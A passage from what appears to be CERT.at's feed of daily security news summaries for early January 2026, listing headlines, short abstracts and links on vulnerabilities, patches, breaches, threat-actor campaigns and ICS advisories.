&lt;A HREF=&quot;https://typo3.org/security/advisory/typo3-core-sa-2026-003&quot;&gt;https://typo3.org/security/advisory/typo3-core-sa-2026-003&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ServiceNow Patches Critical AI Platform Flaw Allowing Unauthenticated User Impersonation&lt;/h3&gt;

ServiceNow has disclosed details of a now-patched critical security flaw impacting its ServiceNow AI Platform that could enable an unauthenticated user to impersonate another user and perform arbitrary actions as that user. The vulnerability, tracked as CVE-2025-12420, carries a CVSS score of 9.3 out of 10.0.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/servicenow-patches-critical-ai-platform.html&quot;&gt;https://thehackernews.com/2026/01/servicenow-patches-critical-ai-platform.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates for Tuesday&lt;/h3&gt;

Security updates have been issued by AlmaLinux (mariadb10.11, mariadb:10.11, mariadb:10.3, mariadb:10.5, and tar), Debian (net-snmp), Fedora (coturn, NetworkManager-l2tp, openssh, and tuxanci), Mageia (libtasn1), Oracle (buildah, cups, httpd, kernel, libpq, libsoup, libsoup3, mariadb:10.11, mariadb:10.3, openssl, and podman), SUSE (cpp-httplib, ImageMagick, libtasn1, python-cbor2, util-linux, valkey, and wget2), and Ubuntu (google-guest-agent, linux-iot, and python-urllib3).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1053988/&quot;&gt;https://lwn.net/Articles/1053988/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Remote Code Execution With Modern AI/ML Formats and Libraries&lt;/h3&gt;

We identified remote code execution vulnerabilities in open-source AI/ML libraries published by Apple, Salesforce and NVIDIA.
&lt;p /&gt;
&lt;A HREF=&quot;https://unit42.paloaltonetworks.com/rce-vulnerabilities-in-ai-python-libraries/&quot;&gt;https://unit42.paloaltonetworks.com/rce-vulnerabilities-in-ai-python-libraries/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;YoSmart YoLink Smart Hub&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-013-03&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-013-03&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Rockwell Automation FactoryTalk DataMosaix Private Cloud&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-013-02&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-013-02&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Rockwell Automation 432ES-IG3 Series A&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-013-01&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-013-01&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security Vulnerabilities fixed in Firefox 147&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.mozilla.org/en-US/security/advisories/mfsa2026-01/&quot;&gt;https://www.mozilla.org/en-US/security/advisories/mfsa2026-01/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-13T18:50:40Z</dc:date></entry><entry><title>Tageszusammenfassung - 12.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-12012026"/><author><name>CERT.at</name></author><updated>2026-01-12T18:25:46Z</updated><published>2026-01-12T18:25:46Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Freitag 09-01-2026 18:00 - Montag 12-01-2026 18:00
Handler:     Felician Fuchs
Co-Handler:  Alexander Riepl


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Max severity Ni8mare flaw impacts nearly 60,000 n8n instances&lt;/h3&gt;

Nearly 60,000 n8n instances exposed online remain unpatched against a maximum-severity vulnerability dubbed &quot;Ni8mare.&quot;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/max-severity-ni8mare-flaw-impacts-nearly-60-000-n8n-instances/&quot;&gt;https://www.bleepingcomputer.com/news/security/max-severity-ni8mare-flaw-impacts-nearly-60-000-n8n-instances/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Spanish energy giant Endesa discloses data breach affecting customers&lt;/h3&gt;

Spanish energy provider Endesa and its Energía XXI operator are notifying customers that hackers accessed the company's systems and accessed contract-related information, which includes personal details.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/spanish-energy-giant-endesa-discloses-data-breach-affecting-customers/&quot;&gt;https://www.bleepingcomputer.com/news/security/spanish-energy-giant-endesa-discloses-data-breach-affecting-customers/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hidden Telegram proxy links can reveal your IP address in one click&lt;/h3&gt;

A single click on what may appear to be a Telegram username or harmless link is all it takes to expose your real IP address to attackers due to how proxy links are handled. Telegram says it will add warnings to proxy links after researchers demonstrated that such one-click interactions could reveal a Telegram user's real IP address.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/hidden-telegram-proxy-links-can-reveal-your-ip-address-in-one-click/&quot;&gt;https://www.bleepingcomputer.com/news/security/hidden-telegram-proxy-links-can-reveal-your-ip-address-in-one-click/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Illicit Crypto Economy Surges Amid Increased Nation-State Activity&lt;/h3&gt;

Cybercriminal cryptocurrency transactions totaled billions in 2025, with activity from sanctioned countries like Russia and Iran causing the largest jump.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.darkreading.com/cyber-risk/illicit-crypto-economy-surges-nation-states&quot;&gt;https://www.darkreading.com/cyber-risk/illicit-crypto-economy-surges-nation-states&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Russia's Fancy Bear APT Doubles Down on Global Secrets Theft&lt;/h3&gt;

The notorious state-sponsored group relies on basic techniques that are highly effective, often delivering greater ROI than more complex malware-heavy operations.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.darkreading.com/cyberattacks-data-breaches/russian-apt-credentials-global-targets&quot;&gt;https://www.darkreading.com/cyberattacks-data-breaches/russian-apt-credentials-global-targets&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Two Separate Campaigns Target Exposed LLM Services&lt;/h3&gt;

A total of 91,403 sessions targeted public LLM endpoints to find leaks in organizations' use of AI and map an expanding attack surface.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.darkreading.com/endpoint-security/separate-campaigns-target-exposed-llm-services&quot;&gt;https://www.darkreading.com/endpoint-security/separate-campaigns-target-exposed-llm-services&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cybersecurity Act: EU Commission wants a hard ban on Huawei&lt;/h3&gt;

The EU Commission now wants to make mandatory the restrictions on Chinese equipment suppliers that have so far been voluntary. This is highly controversial within the EU and appears out of step with the times.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/cybersecurity-act-eu-kommission-will-hartes-verbot-von-huawei-2601-204031.html&quot;&gt;https://www.golem.de/news/cybersecurity-act-eu-kommission-will-hartes-verbot-von-huawei-2601-204031.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Payslips sent to the wrong recipients: GDPR incident at Datev&lt;/h3&gt;

After a technical fault in Datev's payroll processing, customer data ended up in the wrong hands. The trigger was, of all things, an attempt to fix the problem.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/lohnabrechnungen-falsch-verschickt-dsgvo-vorfall-bei-der-datev-2601-204034.html&quot;&gt;https://www.golem.de/news/lohnabrechnungen-falsch-verschickt-dsgvo-vorfall-bei-der-datev-2601-204034.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Researchers Uncover Service Providers Fueling Industrial-Scale Pig Butchering Fraud&lt;/h3&gt;

Cybersecurity researchers have shed light on two service providers that supply online criminal networks with the necessary tools and infrastructure to fuel the pig butchering-as-a-service (PBaaS) economy.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/researchers-uncover-service-providers.html&quot;&gt;https://thehackernews.com/2026/01/researchers-uncover-service-providers.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;GoBruteforcer Botnet Targets Crypto Project Databases by Exploiting Weak Credentials&lt;/h3&gt;

A new wave of GoBruteforcer attacks has targeted databases of cryptocurrency and blockchain projects to co-opt them into a botnet that's capable of brute-forcing user passwords for services such as FTP, MySQL, PostgreSQL, and phpMyAdmin on Linux servers.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/gobruteforcer-botnet-targets-crypto.html&quot;&gt;https://thehackernews.com/2026/01/gobruteforcer-botnet-targets-crypto.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;UK government exempting itself from flagship cyber law inspires little confidence&lt;/h3&gt;

Ministers promise equivalent standards, just without the legal obligation. ANALYSIS: From May's cyberattack on the Legal Aid Agency to the Foreign Office breach months later, cyber incidents have become increasingly common in UK government.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.theregister.com/2026/01/10/csr_bill_analysis/&quot;&gt;https://www.theregister.com/2026/01/10/csr_bill_analysis/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Instagram data leak: data from 6.2 million accounts at Have I Been Pwned&lt;/h3&gt;

Data from 6.2 million Instagram users has ended up at the Have I Been Pwned project.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Instagram-6-2-Millionen-Nutzerdaten-mittels-Scraping-abgegriffen-11137222.html&quot;&gt;https://www.heise.de/news/Instagram-6-2-Millionen-Nutzerdaten-mittels-Scraping-abgegriffen-11137222.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ÖIAT focus survey reveals: massive presence of subscription traps in Google ads&lt;/h3&gt;

In an in-depth analysis of the Google Ads Library, the Austrian Institute for Applied Telecommunications (ÖIAT) discovered a large number of dangerous ads. In total there were well over 27,000 problematic advertisements serving as bait for subscription traps. Google has so far not responded to complaints.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/schwerpunkterhebung-abo-fallen-google/&quot;&gt;https://www.watchlist-internet.at/news/schwerpunkterhebung-abo-fallen-google/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Basketball player arrested for alleged ransomware ties freed in Russia-France prisoner swap&lt;/h3&gt;

Daniil Kasatkin, 26, was seen in a video shared by Russian state news outlet TASS emerging from a plane that was then used to send French researcher Laurent Vinatier back to France.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/france-frees-russian-basketball-player-ransomware-swap&quot;&gt;https://therecord.media/france-frees-russian-basketball-player-ransomware-swap&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;MC1215070: MFA mandatory for the Microsoft 365 Admin Center from February 2026&lt;/h3&gt;

A brief note for administrators of Microsoft 365 tenants. For security reasons, Microsoft will enforce multi-factor authentication (MFA) for administrator sign-in to the Microsoft 365 Admin Center from 9 February 2026. Without appropriate measures in place, sign-in will then fail.
&lt;p /&gt;
&lt;A HREF=&quot;https://borncity.com/blog/2026/01/11/mc1215070-mfa-fuer-microsoft-365-admin-center-kuenftig-pflicht/&quot;&gt;https://borncity.com/blog/2026/01/11/mc1215070-mfa-fuer-microsoft-365-admin-center-kuenftig-pflicht/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Database of 323,986 BreachForums Users Leaked as Admin Disputes Scope&lt;/h3&gt;

Database of 323,986 BreachForums users leaked online as forum admins claim the exposed data is partial and dates back to August 2025.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/breachforums-database-users-leak-admin-disputes/&quot;&gt;https://hackread.com/breachforums-database-users-leak-admin-disputes/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Everest Ransomware Claims Breach at Nissan, Says 900GB of Data Stolen&lt;/h3&gt;

Everest ransomware claims to have breached Nissan Motor Corporation, alleging the theft of 900GB of internal data, including documents and screenshots.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/everest-ransomware-nissan-data-breach/&quot;&gt;https://hackread.com/everest-ransomware-nissan-data-breach/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;How Safe is the Rust Ecosystem? A Deep Dive into crates.io&lt;/h3&gt;

The relentless wave of high-impact supply chain attacks throughout 2025, most notably the major incident within npm [..], suggests this trend is far from peaking. In fact, with the rapid adoption of AI and LLMs in development workflows, we are likely facing an acceleration of these threats rather than a decline, in my opinion.
&lt;p /&gt;
&lt;A HREF=&quot;https://mr-leshiy-blog.web.app/blog/crates_io_analysis/&quot;&gt;https://mr-leshiy-blog.web.app/blog/crates_io_analysis/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Detection of Kerberos Golden Ticket Attacks via Velociraptor&lt;/h3&gt;

Kerberos is a strange technology. Over the years, I've gone through its internal workings again and again, yet parts of it always seem to slip away. It has been a while since I did my OSCP, so inevitably I've found myself back in this topic to refresh my knowledge.
&lt;p /&gt;
&lt;A HREF=&quot;https://detect.fyi/detection-of-kerberos-golden-ticket-attacks-via-velociraptor-cfe7cc26d3eb&quot;&gt;https://detect.fyi/detection-of-kerberos-golden-ticket-attacks-via-velociraptor-cfe7cc26d3eb&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Security update: Dell laptops with Adreno GPU are vulnerable&lt;/h3&gt;

The driver for Qualcomm's Adreno GPU is riddled with holes and endangers the security of various Dell laptops. A fixed driver is available for download.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Sicherheitsupdate-Dell-Laptops-mit-Adreno-GPU-sind-verwundbar-11137255.html&quot;&gt;https://www.heise.de/news/Sicherheitsupdate-Dell-Laptops-mit-Adreno-GPU-sind-verwundbar-11137255.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates for Monday&lt;/h3&gt;

Security updates have been issued by Debian (chromium and sogo), Fedora (chromium, foomuuri, libpng, libsodium, mariadb10.11, musescore, nginx, python-pdfminer, python-urllib3, python3.12, seamonkey, wasmedge, and wget2), Mageia (curl, libpcap, sodium, wget2, and zlib), Slackware (lcms2), SUSE (chromedriver, chromium, noopenh264, coredns, curl, dcmtk, fontforge, gdk-pixbuf-loader-libheif, gimp, kernel, libheif, libpng16, libsoup-2_4-1, libvirt, mariadb, php8, poppler, python-filelock, python-tornado6, python311-aiohttp, qemu, sssd, and traefik), and Ubuntu (libheif, libtasn1-6, linux-azure-nvidia, linux-kvm, linux-raspi, linux-raspi-realtime, and php7.2, php7.4, php8.1, php8.3, php8.4).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1053820/&quot;&gt;https://lwn.net/Articles/1053820/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-12T18:25:46Z</dc:date></entry><entry><title>Tageszusammenfassung - 09.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-09012026"/><author><name>CERT.at</name></author><updated>2026-01-09T18:57:52Z</updated><published>2026-01-09T18:57:52Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Donnerstag 08-01-2026 18:00 - Freitag 09-01-2026 18:00
Handler:     Felician Fuchs
Co-Handler:  n/a


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;VMware ESXi zero-days likely exploited a year before disclosure&lt;/h3&gt;

Chinese-speaking threat actors used a compromised SonicWall VPN appliance to deliver a VMware ESXi exploit toolkit that seems to have been developed more than a year before the targeted vulnerabilities became publicly known.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/vmware-esxi-zero-days-likely-exploited-a-year-before-disclosure/&quot;&gt;https://www.bleepingcomputer.com/news/security/vmware-esxi-zero-days-likely-exploited-a-year-before-disclosure/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;FBI warns about Kimsuky hackers using QR codes to phish U.S. orgs&lt;/h3&gt;

The North Korean state-sponsored hacker group Kimsuky is using malicious QR codes in spearphishing campaigns that target U.S. organizations, the Federal Bureau of Investigation warns in a flash alert.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/fbi-warns-about-kimsuky-hackers-using-qr-codes-to-phish-us-orgs/&quot;&gt;https://www.bleepingcomputer.com/news/security/fbi-warns-about-kimsuky-hackers-using-qr-codes-to-phish-us-orgs/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;New China-linked hackers breach telcos using edge device exploits&lt;/h3&gt;

A sophisticated threat actor that uses Linux-based malware to target telecommunications providers has recently broadened its operations to include organizations in Southeastern Europe.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/new-china-linked-hackers-breach-telcos-using-edge-device-exploits/&quot;&gt;https://www.bleepingcomputer.com/news/security/new-china-linked-hackers-breach-telcos-using-edge-device-exploits/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Defeating KASLR by Doing Nothing at All&lt;/h3&gt;

I've recently been researching Pixel kernel exploitation and as part of this research I found myself with an excellent arbitrary write primitive, but without a KASLR leak. As necessity is the mother of all invention, on a hunch, I started researching the Linux kernel linear mapping.
&lt;p /&gt;
&lt;A HREF=&quot;https://projectzero.google/2025/11/defeating-kaslr-by-doing-nothing-at-all.html&quot;&gt;https://projectzero.google/2025/11/defeating-kaslr-by-doing-nothing-at-all.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Google Sees Spam, You See Your Site: A Cloaked SEO Spam Attack&lt;/h3&gt;

We recently handled a case where a customer reported strange SEO behavior on their website. Regular visitors saw a normal site. No popups. No redirects. No visible spam. However, when they checked their site on Google, the search results were flooded with eBay-type-looking websites and 'Situs Toto' gambling spam. This is a professional-grade SEO cloaking attack.
&lt;p /&gt;
&lt;A HREF=&quot;https://blog.sucuri.net/2026/01/google-sees-spam-you-see-your-site-a-cloaked-seo-spam-attack.html&quot;&gt;https://blog.sucuri.net/2026/01/google-sees-spam-you-see-your-site-a-cloaked-seo-spam-attack.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Russian APT28 Runs Credential-Stealing Campaign Targeting Energy and Policy Organizations&lt;/h3&gt;

Russian state-sponsored threat actors have been linked to a fresh set of credential harvesting attacks targeting individuals associated with a Turkish energy and nuclear research agency, as well as staff affiliated with a European think tank and organizations in North Macedonia and Uzbekistan.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/russian-apt28-runs-credential-stealing.html&quot;&gt;https://thehackernews.com/2026/01/russian-apt28-runs-credential-stealing.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Auslegungssache 150: On the trail of digital evidence&lt;/h3&gt;

In the c't data protection podcast, an IT forensics expert explains how she secures evidence after incidents, negotiates with extortionists and keeps data protection in view.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/hintergrund/Auslegungssache-150-Auf-digitaler-Spurensuche-11134668.html&quot;&gt;https://www.heise.de/hintergrund/Auslegungssache-150-Auf-digitaler-Spurensuche-11134668.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;From Munich to Seville: international strike against the 'Black Axe' cyber mafia&lt;/h3&gt;

Investigators in Spain dealt a heavy blow to the Nigerian cyber mafia known as 'Black Axe'.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Von-Muenchen-bis-Sevilla-Internationaler-Schlag-gegen-Cyber-Mafia-Black-Axe-11135925.html&quot;&gt;https://www.heise.de/news/Von-Muenchen-bis-Sevilla-Internationaler-Schlag-gegen-Cyber-Mafia-Black-Axe-11135925.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Who Benefited from the Aisuru and Kimwolf Botnets?&lt;/h3&gt;

Our first story of 2026 revealed how a destructive new botnet called Kimwolf rapidly grew to infect more than two million devices by mass-compromising a vast number of unofficial Android TV streaming boxes. Today, we'll dig through digital clues left behind by the hackers, network operators, and cybercrime services that appear to have benefitted from Kimwolf's spread.
&lt;p /&gt;
&lt;A HREF=&quot;https://krebsonsecurity.com/2026/01/who-benefited-from-the-aisuru-and-kimwolf-botnets/&quot;&gt;https://krebsonsecurity.com/2026/01/who-benefited-from-the-aisuru-and-kimwolf-botnets/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;CPPA fines data broker selling lists of Alzheimer's patients&lt;/h3&gt;

Datamasters bought and resold the names, addresses, phone numbers and email addresses of millions of people with Alzheimer's disease, drug addiction, bladder incontinence and other medical conditions for targeted advertising, according to the CPPA.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/ccpa-fines-data-broker-selling-lists-alzheimers&quot;&gt;https://therecord.media/ccpa-fines-data-broker-selling-lists-alzheimers&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Russian Hacktivists hack CCTV Cameras in Denmark&lt;/h3&gt;

The hacktivists had recorded part of the video stream from the CCTV as proof of the hack and published it. It was reported that no individuals were identifiable on the recording.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.truesec.com/hub/blog/russian-hacktivists-hack-cctv-cameras-in-denmark&quot;&gt;https://www.truesec.com/hub/blog/russian-hacktivists-hack-cctv-cameras-in-denmark&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cisco switches go into boot loops because of a DNS error&lt;/h3&gt;

Administrators worldwide are apparently struggling with certain Cisco switches being caught in a restart loop (boot loop). This occurs after the devices have logged a DNS client error.
&lt;p /&gt;
&lt;A HREF=&quot;https://borncity.com/blog/2026/01/09/cisco-switches-gehen-wegen-dns-fehler-in-boot-schleifen/&quot;&gt;https://borncity.com/blog/2026/01/09/cisco-switches-gehen-wegen-dns-fehler-in-boot-schleifen/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hacker Behind Wired.com Leak Now Selling Full 40M Condé Nast Records&lt;/h3&gt;

A hacker claims to be selling nearly 40 million Condé Nast user records after leaking Wired.com data, with multiple major brands allegedly affected.
&lt;p /&gt;
&lt;A HREF=&quot;https://hackread.com/wired-com-hacker-data-leak-conde-nast-records/&quot;&gt;https://hackread.com/wired-com-hacker-data-leak-conde-nast-records/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Threat Actors Actively Targeting LLMs&lt;/h3&gt;

Our Ollama honeypot infrastructure captured 91,403 attack sessions between October 2025 and January 2026. Buried in that data: two distinct campaigns that reveal how threat actors are systematically mapping the expanding surface area of AI deployments.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.greynoise.io/blog/threat-actors-actively-targeting-llms&quot;&gt;https://www.greynoise.io/blog/threat-actors-actively-targeting-llms&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Do Smart People Ever Say They're Smart? (SmarterTools SmarterMail Pre-Auth RCE CVE-2025-52691)&lt;/h3&gt;

Welcome to 2026! While we are all waiting for the scheduled SSLVPN ITW exploitation programming that occurs every January, we're back from Christmas and idle hands, idle minds, yada yada. In December, we were alerted to a vulnerability in SmarterTools' SmarterMail solution, accompanied by an advisory from Singapore's Cyber Security Agency (CSA) - CVE-2025-52691, a pre-auth RCE that obtained full marks (10/10) on the industry's scale.
&lt;p /&gt;
&lt;A HREF=&quot;https://labs.watchtowr.com/do-smart-people-ever-say-theyre-smart-smartertools-smartermail-pre-auth-rce-cve-2025-52691/&quot;&gt;https://labs.watchtowr.com/do-smart-people-ever-say-theyre-smart-smartertools-smartermail-pre-auth-rce-cve-2025-52691/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fake Windows Update and BSOD Alerts Used in a Tech Support Scam&lt;/h3&gt;

While reviewing submissions received through the WordPress feedback form on my website, I came across a URL that initially appeared unremarkable. Such submissions are common and often contain benign questions or comments, but this particular link stood out enough to warrant closer inspection.
&lt;p /&gt;
&lt;A HREF=&quot;https://malwr-analysis.com/2026/01/09/fake-windows-update-and-bsod-alerts-used-in-a-tech-support-scam/&quot;&gt;https://malwr-analysis.com/2026/01/09/fake-windows-update-and-bsod-alerts-used-in-a-tech-support-scam/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;VU#361400: BeeS Software Solutions BeeS Examination Tool (BET) portal contains SQL injection vulnerability&lt;/h3&gt;

The BeeS Examination Tool (BET) portal from BeeS Software Solutions contains an SQL injection vulnerability in its website login functionality. More than 100 universities use the BET portal for test administration and other academic tasks.
&lt;p /&gt;
&lt;A HREF=&quot;https://kb.cert.org/vuls/id/361400&quot;&gt;https://kb.cert.org/vuls/id/361400&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;RICOH Streamline NX vulnerable to improper authorization&lt;/h3&gt;

RICOH Streamline NX provided by Ricoh Company, Ltd. contains an improper authorization vulnerability.
&lt;p /&gt;
&lt;A HREF=&quot;https://jvn.jp/en/jp/JVN12770174/&quot;&gt;https://jvn.jp/en/jp/JVN12770174/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Trend Micro Apex Central RCE Flaw Scores 9.8 CVSS in On-Prem Windows Versions&lt;/h3&gt;

Trend Micro has released security updates to address multiple security vulnerabilities impacting on-premise versions of Apex Central for Windows, including a critical bug that could result in arbitrary code execution. The vulnerability, tracked as CVE-2025-69258, carries a CVSS score of 9.8 out of a maximum of 10.0.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/01/trend-micro-apex-central-rce-flaw.html&quot;&gt;https://thehackernews.com/2026/01/trend-micro-apex-central-rce-flaw.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;VLC media player: updated version plugs numerous holes&lt;/h3&gt;

Version 3.0.23 of VLC Media Player fixes various vulnerabilities that may allow malicious code to be smuggled in.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/VLC-stopft-diverse-Sicherheitslecks-11135921.html&quot;&gt;https://www.heise.de/news/VLC-stopft-diverse-Sicherheitslecks-11135921.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security updates for Friday&lt;/h3&gt;

Security updates have been issued by Debian (pdfminer and vlc), Red Hat (kernel, kernel-rt, and microcode_ctl), Slackware (libtasn1), SUSE (apptainer, curl, ImageMagick, libpcap, libvirt, libwget4, php8, podman, python311-cbor2, qemu, and rsync), and Ubuntu (gnupg, gnupg2, gpsd, libsodium, and python-tornado).
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1053492/&quot;&gt;https://lwn.net/Articles/1053492/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Hitachi Energy Asset Suite&lt;/h3&gt;

Hitachi Energy is aware of a Jasper Report vulnerability that affects the Asset Suite product versions mentioned in this document below. This vulnerability can be exploited to carry out a remote code execution (RCE) attack on the product. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cisa.gov/news-events/ics-advisories/icsa-26-008-01&quot;&gt;https://www.cisa.gov/news-events/ics-advisories/icsa-26-008-01&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;K000159018: Linux kernel vulnerability CVE-2023-53178&lt;/h3&gt;

A local unprivileged user may exploit this vulnerability and cause data integrity issues or system instability under specific conditions.
&lt;p /&gt;
&lt;A HREF=&quot;https://my.f5.com/manage/s/article/K000159018&quot;&gt;https://my.f5.com/manage/s/article/K000159018&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-01-09T18:57:52Z</dc:date></entry><entry><title>Tageszusammenfassung - 08.01.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/1/tagesberichte-08012026"/><author><name>CERT.at</name></author><updated>2026-01-08T19:11:30Z</updated><published>2026-01-08T19:11:30Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Mittwoch 07-01-2026 18:00 - Donnerstag 08-01-2026 18:00
Handler:     Felician Fuchs
Co-Handler:  n/a


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;New GoBruteforcer attack wave targets crypto, blockchain projects&lt;/h3&gt;

A new wave of GoBruteforcer botnet malware attacks is targeting databases of cryptocurrency and blockchain projects on exposed servers believed to be configured using AI-generated examples.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/new-gobruteforcer-attack-wave-targets-crypto-blockchain-projects/&quot;&gt;https://www.bleepingcomputer.com/news/security/new-gobruteforcer-attack-wave-targets-crypto-blockchain-projects/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Cisco warns of Identity Service Engine flaw with exploit code&lt;/h3&gt;

Cisco has patched an ISE vulnerability with public proof-of-concept exploit code that can be abused by attackers with admin privileges.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/cisco-warns-of-identity-service-engine-flaw-with-exploit-code/&quot;&gt;https://www.bleepingcomputer.com/news/security/cisco-warns-of-identity-service-engine-flaw-with-exploit-code/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Activate MFA urgently: massive data exfiltration from cloud instances&lt;/h3&gt;

Affected are self-hosted instances of Owncloud, Nextcloud and Sharefile. Data from 50 organizations is up for sale because MFA was not enabled.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/dringend-mfa-aktivieren-massenhaft-daten-aus-cloud-instanzen-abgeflossen-2601-203932.html&quot;&gt;https://www.golem.de/news/dringend-mfa-aktivieren-massenhaft-daten-aus-cloud-instanzen-abgeflossen-2601-203932.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;NIS-2 implementation: BSI launches reporting portal on Amazon servers&lt;/h3&gt;

